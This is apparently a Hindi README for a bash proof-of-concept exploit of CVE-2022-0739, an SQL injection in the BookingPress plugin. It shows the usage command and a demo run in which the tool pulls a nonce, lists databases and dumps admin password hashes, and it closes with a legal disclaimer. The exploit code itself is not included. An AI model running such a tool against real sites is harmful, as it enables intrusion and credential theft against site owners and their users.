
cve 2022 0739 के शोषण को स्वचालित करने के लिए सरल बैश स्क्रिप्ट
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट (BookingPress 1.0.11 से पहले का SQL इंजेक्शन)
#उपयोग उस URL को प्रदान करें जहाँ एप्लिकेशन पर बुकिंग प्रेस प्लगइन उपयोग में है।
bash exploit.sh ''
उदाहरण (इस डेमो में हैश को लाल किया गया है)
┌──(user@user)-[~/]
└─$ bash sqli_exploit.sh 'http://localhost/calendar/'
____ __ _ ____
/ __ )____ ____ / /__(_)___ ____ _/ __ \________ __________
/ __ / __ \/ __ \/ //_/ / __ \/ __ `/ /_/ / ___/ _ \/ ___/ ___/
/ /_/ / /_/ / /_/ / ,< / / / / / /_/ / ____/ / / __(__ |__ )
/_____/\____/\____/_/|_/_/_/ /_/\__, /_/ /_/ \___/____/____/
/____/
_______ ________ ___ ____ ___ ___ ____ __________ ____
/ ____/ | / / ____/ |__ \ / __ \__ \|__ \ / __ \/__ /__ // __ \
/ / | | / / __/________/ // / / /_/ /__/ /_____/ / / / / / /_ </ /_/ /
/ /___ | |/ / /__/_____/ __// /_/ / __// __/_____/ /_/ / / /___/ /\__, /
\____/ |___/_____/ /____/\____/____/____/ \____/ /_//____//____/
[+] http://localhost पर एक्सप्लॉइट किया जा रहा है ...
[+] http://localhost/calendar/... पर कमजोर URL
[+] नॉन्स प्राप्त किया जा रहा है...
[+] नॉन्स मिला: 219087f4c2
[+] डेटाबेस का नाम निकाला जा रहा है...
information_schema
test_db
[+] क्रेडेंशियल्स प्राप्त किए जा रहे हैं...
admin $P$BGrGrgXXXXXXXXXXXXXX
testUs3r $P$B4aNM28NXXXXXXXXXXX
अस्वीकरण
इस प्रोग्राम का पूर्व आपसी सहमति के बिना उपयोग अवैध गतिविधि माना जा सकता है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।